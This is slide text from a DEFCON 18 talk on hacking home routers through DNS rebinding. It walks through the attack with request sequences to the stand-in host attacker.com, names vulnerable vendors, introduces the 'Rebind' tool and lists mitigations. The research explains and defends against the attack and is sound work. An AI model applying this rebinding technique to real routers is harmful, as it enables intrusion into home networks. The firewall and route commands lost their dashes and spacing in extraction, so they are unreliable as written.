defcon 18 heffner routers
TRANSCRIPT
-
8/9/2019 DEFCON 18 Heffner Routers
1/88
How to Hack Millions of Routers
Craig Heffner, Seismic LLC
-
8/9/2019 DEFCON 18 Heffner Routers
2/88
SOHO RouterSecurity?
-
8/9/2019 DEFCON 18 Heffner Routers
3/88
Common Attack Techniques
Cross Site Request Forgery No trust relationship between browser and router
Cant forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work Most
-
8/9/2019 DEFCON 18 Heffner Routers
4/88
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP addresses in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Cant rebind to an RFC1918 IP addresses
-
8/9/2019 DEFCON 18 Heffner Routers
5/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
Target IP: 2.3.5.8Attacker IP: 1.4.1.4Attacker Domain: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
6/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
What is the IP address forattacker.com?
-
8/9/2019 DEFCON 18 Heffner Routers
7/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
1.4.1.42.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
8/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1Host: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
9/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
10/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1Host: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
11/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
TCP RST
-
8/9/2019 DEFCON 18 Heffner Routers
12/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1Host: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
13/88
Rebinding to a Public IP
1.4.1.4
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
14/88
Rebinding to a Private IP
1.4.1.4
Target IP: 192.168.1.1Attacker IP: 1.4.1.4Attacker Domain: attacker.com
192.168.1.1
-
8/9/2019 DEFCON 18 Heffner Routers
15/88
Rebinding to a Private IP
1.4.1.4
What is the IP address forattacker.com?
192.168.1.1
-
8/9/2019 DEFCON 18 Heffner Routers
16/88
Rebinding to a Private IP
1.4.1.4
1.4.1.4192.168.1.1
192.168.1.1
-
8/9/2019 DEFCON 18 Heffner Routers
17/88
Rebinding to a Private IP
1.4.1.4
GET / HTTP/1.1Host: attacker.com
192.168.1.1
-
8/9/2019 DEFCON 18 Heffner Routers
18/88
Rebinding to a Private IP
1.4.1.4
192.168.1.1
-
8/9/2019 DEFCON 18 Heffner Routers
19/88
Services Bound to All Interfaces
# netstatl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
-
8/9/2019 DEFCON 18 Heffner Routers
20/88
Firewall Rules Based on Interface Names
-A INPUTi ethoj DROP -A INPUTj ACCEPT
-
8/9/2019 DEFCON 18 Heffner Routers
21/88
IP Stack Implementations
RFC 1122 defines two IP models: Strong End System Model
Weak End System Model
-
8/9/2019 DEFCON 18 Heffner Routers
22/88
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whosedestination address does not correspond to the physicalinterface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IPdatagrams only through the physical interface that correspondsto the IP source address of the datagrams.
-
8/9/2019 DEFCON 18 Heffner Routers
23/88
Weak End System Model
eth1192.168.1.1
eth02.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
24/88
Weak End System Model
TCP SYN PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80
eth1192.168.1.1
eth02.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
25/88
Weak End System Model
TCP SYN/ACK PacketSource IP: 2.3.5.8Destination IP: 192.168.1.100Source Port: 80
eth1192.168.1.1
eth02.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
26/88
Weak End System Model
TCP ACK PacketSource IP: 192.168.1.100Destination IP: 2.3.5.8Destination Port: 80
eth1192.168.1.1
eth02.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
27/88
Traffic Capture
-
8/9/2019 DEFCON 18 Heffner Routers
28/88
End Result
-
8/9/2019 DEFCON 18 Heffner Routers
29/88
Public IP Rebinding Attack
1.4.1.4
Target IP: 2.3.5.8Attacker IP: 1.4.1.4Attacker Domain: attacker.com
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
30/88
Public IP Rebinding Attack
1.4.1.4
What is the IP address forattacker.com?
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
31/88
Public IP Rebinding Attack
1.4.1.4
1.4.1.42.3.5.8
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
32/88
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1Host: attacker.com
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
33/88
Public IP Rebinding Attack
1.4.1.4
...
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
34/88
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1Host: attacker.com
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
35/88
Public IP Rebinding Attack
1.4.1.4
TCP RST
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
36/88
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1Host: attacker.com
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
37/88
Public IP Rebinding Attack
1.4.1.4
2.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
38/88
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Dont need to know routers internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses Must implement the weak end system model
Not all routers are vulnerable
-
8/9/2019 DEFCON 18 Heffner Routers
39/88
Affected Routers
-
8/9/2019 DEFCON 18 Heffner Routers
40/88
Asus
-
8/9/2019 DEFCON 18 Heffner Routers
41/88
Belkin
-
8/9/2019 DEFCON 18 Heffner Routers
42/88
Dell
-
8/9/2019 DEFCON 18 Heffner Routers
43/88
Thompson
-
8/9/2019 DEFCON 18 Heffner Routers
44/88
Linksys
-
8/9/2019 DEFCON 18 Heffner Routers
45/88
Third Party Firmware
-
8/9/2019 DEFCON 18 Heffner Routers
46/88
ActionTec
-
8/9/2019 DEFCON 18 Heffner Routers
47/88
Making the Attack Practical
To make the attack practical:
Must obtain targets public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
-
8/9/2019 DEFCON 18 Heffner Routers
48/88
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time Via a standard HTTP proxy
-
8/9/2019 DEFCON 18 Heffner Routers
49/88
Rebind
2.3.5.8 1.4.1.4
Target IP: 2.3.5.8Rebind IP: 1.4.1.4Attacker Domain: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
50/88
Rebind
-
8/9/2019 DEFCON 18 Heffner Routers
51/88
Rebind
-
8/9/2019 DEFCON 18 Heffner Routers
52/88
Rebind
2.3.5.8 1.4.1.4
What is the IP address forattacker.com?
-
8/9/2019 DEFCON 18 Heffner Routers
53/88
Rebind
2.3.5.8 1.4.1.4
1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
54/88
Rebind
2.3.5.8 1.4.1.4
GET /init HTTP/1.1Host: attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
55/88
Rebind
2.3.5.8 1.4.1.4
Location: http://wacme.attacker.com/exec
-
8/9/2019 DEFCON 18 Heffner Routers
56/88
Rebind
2.3.5.8 1.4.1.4
What is the IP address forwacme.attacker.com?
-
8/9/2019 DEFCON 18 Heffner Routers
57/88
Rebind
2.3.5.8 1.4.1.4
1.4.1.42.3.5.8
-
8/9/2019 DEFCON 18 Heffner Routers
58/88
Rebind
2.3.5.8 1.4.1.4
GET /exec HTTP/1.1Host: wacme.attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
59/88
Rebind
2.3.5.8 1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
60/88
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1Host: wacme.attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
61/88
Rebind
2.3.5.8 1.4.1.4
TCP RST
-
8/9/2019 DEFCON 18 Heffner Routers
62/88
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1Host: wacme.attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
63/88
Rebind
2.3.5.8 1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
64/88
Rebind
2.3.5.8 1.4.1.4
GET /poll HTTP/1.1Host: attacker.com:81
-
8/9/2019 DEFCON 18 Heffner Routers
65/88
Rebind
2.3.5.8 1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
66/88
Rebind
-
8/9/2019 DEFCON 18 Heffner Routers
67/88
Rebind
2.3.5.8 1.4.1.4
GET http://2.3.5.8/ HTTP/1.1
-
8/9/2019 DEFCON 18 Heffner Routers
68/88
Rebind
2.3.5.8 1.4.1.4
GET /poll HTTP/1.1Host: attacker.com:81
-
8/9/2019 DEFCON 18 Heffner Routers
69/88
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1
-
8/9/2019 DEFCON 18 Heffner Routers
70/88
Rebind
2.3.5.8 1.4.1.4
GET / HTTP/1.1Host: wacme.attacker.com
-
8/9/2019 DEFCON 18 Heffner Routers
71/88
Rebind
2.3.5.8 1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
72/88
Rebind
2.3.5.8 1.4.1.4
POST /exec HTTP/1.1Host: attacker.com:81
-
8/9/2019 DEFCON 18 Heffner Routers
73/88
Rebind
2.3.5.8 1.4.1.4
-
8/9/2019 DEFCON 18 Heffner Routers
74/88
Rebind
-
8/9/2019 DEFCON 18 Heffner Routers
75/88
Demo
-
8/9/2019 DEFCON 18 Heffner Routers
76/88
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP Proxy attacks to other Web sites via your browser
As long as the site doesnt check the host header
-
8/9/2019 DEFCON 18 Heffner Routers
77/88
DNS Rebinding Countermeasures
-
8/9/2019 DEFCON 18 Heffner Routers
78/88
Am I Vulnerable?
-
8/9/2019 DEFCON 18 Heffner Routers
79/88
End-User Mitigations
Break any of the attacks conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
-
8/9/2019 DEFCON 18 Heffner Routers
80/88
Blocking Attacks at the Router
Dont bind services to the external interface
May not have sufficient access to the router to change this
Some services dont give you a choice
Re-configure firewall rules -A INPUTi eth1d 172.69.0.0/16j DROP
-
8/9/2019 DEFCON 18 Heffner Routers
81/88
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while youre at it
But be warned Enabling HTTPS wont disable HTTP
In some routers you cant disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you cant disable HNAP
-
8/9/2019 DEFCON 18 Heffner Routers
82/88
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUTd 172.69.0.0/16j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
-
8/9/2019 DEFCON 18 Heffner Routers
83/88
Basic Security Precautions
Change your routers default password
Keep your firmware up to date
Dont trust un-trusted content
-
8/9/2019 DEFCON 18 Heffner Routers
84/88
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
l i
-
8/9/2019 DEFCON 18 Heffner Routers
85/88
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
Q & A
-
8/9/2019 DEFCON 18 Heffner Routers
86/88
Q & A
Rebind project
http://rebind.googlecode.com
Contact
-
8/9/2019 DEFCON 18 Heffner Routers
87/88
R f
-
8/9/2019 DEFCON 18 Heffner Routers
88/88
References
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
p. 218219